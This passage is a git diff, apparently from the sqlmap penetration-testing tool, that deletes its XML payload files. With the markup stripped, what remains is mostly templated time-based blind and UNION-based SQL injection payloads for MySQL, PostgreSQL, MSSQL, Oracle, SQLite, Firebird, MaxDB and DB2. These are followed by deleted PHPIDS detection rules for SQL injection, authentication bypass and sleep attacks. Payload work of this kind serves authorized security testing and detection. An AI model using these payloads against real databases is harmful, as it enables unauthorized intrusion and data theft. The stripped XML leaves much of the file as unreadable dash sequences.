    - MySQL -
    -
    - - - MySQL time-based blind - Parameter replace (MAKE_SET) - 5 - 5 - 1 - 1,2,3 - 3 - MAKE_SET([INFERENCE],SLEEP([SLEEPTIME])) - - MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) - - - - -
    - MySQL -
    -
    - - - MySQL time-based blind - Parameter replace (ELT) - 5 - 5 - 1 - 1,2,3 - 3 - ELT([INFERENCE],SLEEP([SLEEPTIME])) - - ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) - - - - -
    - MySQL -
    -
    - - - PostgreSQL > 8.1 time-based blind - Parameter replace - 5 - 3 - 1 - 1,2,3 - 3 - (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - - (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) - - - - -
    - PostgreSQL - > 8.1 -
    -
    - - - PostgreSQL time-based blind - Parameter replace (heavy query) - 5 - 4 - 2 - 1,2,3 - 3 - (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) - - (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) - - - - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase time-based blind - Parameter replace - 5 - 3 - 1 - 1,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - - - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries) - 5 - 4 - 2 - 1,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)) - - - - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle time-based blind - Parameter replace - 5 - 3 - 1 - 1,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL) - - - - -
    - Oracle -
    -
    - - - Oracle time-based blind - Parameter replace (heavy queries) - 5 - 4 - 2 - 1,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL) - - - - -
    - Oracle -
    -
    - - - SQLite > 2.0 time-based blind - Parameter replace (heavy query) - 5 - 4 - 2 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)) - - (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) - - - - -
    - SQLite - > 2.0 -
    -
    - - - Firebird time-based blind - Parameter replace (heavy query) - 5 - 5 - 2 - 1,2,3 - 3 - IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) - - (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) - - - - -
    - Firebird - >= 2.0 -
    -
    - - - SAP MaxDB time-based blind - Parameter replace (heavy query) - 5 - 5 - 2 - 1,3 - 3 - (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) - - (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) - - - - -
    - SAP MaxDB -
    -
    - - - IBM DB2 AND time-based blind (heavy query) - 5 - 5 - 2 - 1,2,3 - 3 - (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) - - (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) - - - - -
    - IBM DB2 -
    -
    - - - - - - MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses - 5 - 3 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - - - -
    - MySQL - >= 5.0.11 -
    -
    - - - MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query) - 5 - 4 - 2 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - - -
    - MySQL -
    -
    - - - PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses - 5 - 3 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)) - - - - -
    - PostgreSQL - > 8.1 -
    -
    - - - PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query) - 5 - 4 - 2 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)) - - - - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses - 5 - 3 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - - - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query) - 5 - 4 - 2 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) - - - - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle time-based blind - GROUP BY and ORDER BY clauses - 5 - 3 - 1 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - - - - -
    - Oracle -
    -
    - - - Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query) - 5 - 4 - 2 - 2,3 - 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) - - - - -
    - Oracle -
    -
    - - - - - - - MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) - 3 - 1 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [CHAR] - [COLSTART]-[COLSTOP] - - - - -
    - MySQL -
    -
    - - - MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) - 3 - 1 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - NULL - [COLSTART]-[COLSTOP] - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [RANDNUM] - [COLSTART]-[COLSTOP] - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([CHAR]) - 1 to 10 columns - 3 - 1 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [CHAR] - 1-10 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query (NULL) - 1 to 10 columns - 3 - 1 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - NULL - 1-10 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([RANDNUM]) - 1 to 10 columns - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [RANDNUM] - 1-10 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([CHAR]) - 11 to 20 columns - 3 - 2 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [CHAR] - 11-20 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query (NULL) - 11 to 20 columns - 3 - 2 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - NULL - 11-20 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([RANDNUM]) - 11 to 20 columns - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [RANDNUM] - 11-20 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([CHAR]) - 21 to 30 columns - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [CHAR] - 21-30 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query (NULL) - 21 to 30 columns - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - NULL - 21-30 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([RANDNUM]) - 21 to 30 columns - 3 - 4 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [RANDNUM] - 21-30 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([CHAR]) - 31 to 40 columns - 3 - 4 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [CHAR] - 31-40 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query (NULL) - 31 to 40 columns - 3 - 4 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - NULL - 31-40 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([RANDNUM]) - 31 to 40 columns - 3 - 5 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [RANDNUM] - 31-40 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([CHAR]) - 41 to 50 columns - 3 - 5 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [CHAR] - 41-50 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query (NULL) - 41 to 50 columns - 3 - 5 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - NULL - 41-50 - - - - -
    - MySQL -
    -
    - - - MySQL UNION query ([RANDNUM]) - 41 to 50 columns - 3 - 5 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - # - [RANDNUM] - 41-50 - - - - -
    - MySQL -
    -
    - - - Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) - 3 - 1 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [CHAR] - [COLSTART]-[COLSTOP] - - - - - - - - Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) - 3 - 1 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - NULL - [COLSTART]-[COLSTOP] - - - - - - - - Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [RANDNUM] - [COLSTART]-[COLSTOP] - - - - - - - - Generic UNION query ([CHAR]) - 1 to 10 columns - 3 - 1 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [CHAR] - 1-10 - - - - - - - - Generic UNION query (NULL) - 1 to 10 columns - 3 - 1 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - NULL - 1-10 - - - - - - - - Generic UNION query ([RANDNUM]) - 1 to 10 columns - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [RANDNUM] - 1-10 - - - - - - - - Generic UNION query ([CHAR]) - 11 to 20 columns - 3 - 2 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [CHAR] - 11-20 - - - - - - - - Generic UNION query (NULL) - 11 to 20 columns - 3 - 2 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - NULL - 11-20 - - - - - - - - Generic UNION query ([RANDNUM]) - 11 to 20 columns - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [RANDNUM] - 11-20 - - - - - - - - Generic UNION query ([CHAR]) - 21 to 30 columns - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [CHAR] - 21-30 - - - - - - - - Generic UNION query (NULL) - 21 to 30 columns - 3 - 3 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - NULL - 21-30 - - - - - - - - Generic UNION query ([RANDNUM]) - 21 to 30 columns - 3 - 4 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [RANDNUM] - 21-30 - - - - - - - - Generic UNION query ([CHAR]) - 31 to 40 columns - 3 - 4 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [CHAR] - 31-40 - - - - - - - - Generic UNION query (NULL) - 31 to 40 columns - 3 - 4 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - NULL - 31-40 - - - - - - - - Generic UNION query ([RANDNUM]) - 31 to 40 columns - 3 - 5 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [RANDNUM] - 31-40 - - - - - - - - Generic UNION query ([CHAR]) - 41 to 50 columns - 3 - 5 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [CHAR] - 41-50 - - - - - - - Generic UNION query (NULL) - 41 to 50 columns - 3 - 5 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - NULL - 41-50 - - - - - - - - Generic UNION query ([RANDNUM]) - 41 to 50 columns - 3 - 5 - 1 - 1,2,3,4,5 - 1 - [UNION] - - - -- - [RANDNUM] - 41-50 - - - - - - -
    diff --git a/xml/phpids_rules.xml b/xml/phpids_rules.xml deleted file mode 100644 index fa3690fa049..00000000000 --- a/xml/phpids_rules.xml +++ /dev/null @@ -1,199 +0,0 @@ - - - 40 - - Detects MySQL comments, conditions and ch(a)r injections - - sqli - id - lfi - - 6 - - - 41 - ~])]]> - Detects conditional SQL injection attempts - - sqli - id - lfi - - 6 - - - 42 - - Detects classic SQL injection probings 1/2 - - sqli - id - lfi - - 6 - - - 43 - %+-][\w-]+[^\w\s]+"[^,])]]> - Detects classic SQL injection probings 2/2 - - sqli - id - lfi - - 6 - - - 44 - =(),-]\s*[\d"])|(?:"\s*[^\w\s]?=\s*")|(?:"\W*[+=]+\W*")|(?:"\s*[!=|][\d\s!=+-]+.*["(].*$)|(?:"\s*[!=|][\d\s!=]+.*\d+$)|(?:"\s*like\W+[\w"(])|(?:\sis\s*0\W)|(?:where\s[\s\w\.,-]+\s=)|(?:"[<>~]+")]]> - Detects basic SQL authentication bypass attempts 1/3 - - sqli - id - lfi - - 7 - - - 45 - - Detects basic SQL authentication bypass attempts 2/3 - - sqli - id - lfi - - 7 - - - 46 - ^=]+\d\s*(=|or))|(?:"\W+[\w+-]+\s*=\s*\d\W+")|(?:"\s*is\s*\d.+"?\w)|(?:"\|?[\w-]{3,}[^\w\s.,]+")|(?:"\s*is\s*[\d.]+\s*\W.*")]]> - Detects basic SQL authentication bypass attempts 3/3 - - sqli - id - lfi - - 7 - - - 47 - - Detects concatenated basic SQL injection and SQLLFI attempts - - sqli - id - lfi - - 5 - - - 48 - - Detects chained SQL injection attempts 1/2 - - sqli - id - - 6 - - - 49 - - Detects chained SQL injection attempts 2/2 - - sqli - id - - 6 - - - 50 - - Detects SQL benchmark and sleep injection attempts including conditional queries - - sqli - id - - 4 - - - 51 - - Detects MySQL UDF injection and other data/structure manipulation attempts - - sqli - id - - 6 - - - 52 - - Detects MySQL charset switch and MSSQL DoS attempts - - sqli - id - - 6 - - - 53 - - Detects MySQL and PostgreSQL stored procedure/function injections - - sqli - id - - 7 - - - 54 - - Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts - - sqli - id - - 5 - - - 55 - - Detects MSSQL code execution and information gathering attempts - - sqli - id - - 5 - - - 56 - - Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections - - sqli - id - - 5 - - - 57 - - Detects MySQL comment-/space-obfuscated injections - - sqli - id - - 5 - - - 70 - - finds basic MongoDB SQL injection attempts - - sqli - - 4 - - diff --git a/xml/queries.xml b/xml/queries.xml deleted file mode 100644 index 3a1b19f1b1e..00000000000 --- a/xml/queries.xml +++ /dev/null @@ -1,628 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/xml/sqlmap.xsd b/xml/sqlmap.xsd deleted file mode 100644 index 62e35e12bef..00000000000 --- a/xml/sqlmap.xsd +++ /dev/null @@ -1,284 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -